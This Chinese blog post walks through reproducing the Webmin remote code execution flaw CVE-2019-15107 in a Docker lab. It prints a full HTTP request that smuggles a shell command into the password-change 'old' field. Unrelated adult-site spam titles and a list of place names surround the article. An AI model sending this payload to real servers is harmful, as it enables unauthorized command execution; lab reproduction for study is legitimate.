91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Webmin RCE漏洞CVE-2019-15107是怎么復現的

發布時間:2021-12-20 18:04:54 來源:億速云 閱讀:221 作者:柒染 欄目:大數據

這篇文章將為大家詳細講解有關Webmin RCE漏洞CVE-2019-15107是怎么復現的,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

0x00 前言

本來前一陣就想復現來著,但是官網的版本已經更新了,直到今天才發現Docker上有環境,才進行了復現

0x01影響版本

Webmin<=1.920

0x02 環境搭建

docker search webmindocker pull piersonjarvis/webmin-sambadocker run -d -p 10000:80 piersonjarvis/webmin-samba

Webmin RCE漏洞CVE-2019-15107是怎么復現的

訪問你的ip:10000即可訪問1.920版本的webmin

使用賬號密碼:root/webmin登錄到后臺

開啟密碼重置功能:

Webmin--Webmin confuration--Authentication

Webmin RCE漏洞CVE-2019-15107是怎么復現的

0x03 漏洞利用

經過長時間的尋找,未找到修改密碼的接口,所以隨便抓個包手動構造了一個,數據包如下:

POST /password_change.cgi HTTP/1.1Host: 136.244.xx.xx:10000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1X-PJAX: trueX-PJAX-Container: [data-dcontainer]X-PJAX-URL: passwd/edit_passwd.cgi?user=rootX-Requested-From: passwdX-Requested-From-Tab: webminX-Requested-With: XMLHttpRequestContent-Type: text/plain;charset=UTF-8Content-Length: 49DNT: 1Connection: close
user=laemon&old=123123|id&new1=123456&new2=123456

最終執行命令成功

Webmin RCE漏洞CVE-2019-15107是怎么復現的

關于Webmin RCE漏洞CVE-2019-15107是怎么復現的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

沅江市| 前郭尔| 诸城市| 沿河| 西乌珠穆沁旗| 靖宇县| 彩票| 永春县| 桃园县| 侯马市| 达尔| 萝北县| 石阡县| 广饶县| 精河县| 青川县| 德昌县| 泰兴市| 彭州市| 麻江县| 奉节县| 康乐县| 板桥市| 贡山| 蕉岭县| 茌平县| 汪清县| 抚州市| 建湖县| 香港| 田林县| 周口市| 临安市| 苗栗市| 德安县| 东辽县| 台南县| 将乐县| 博罗县| 陈巴尔虎旗| 商洛市|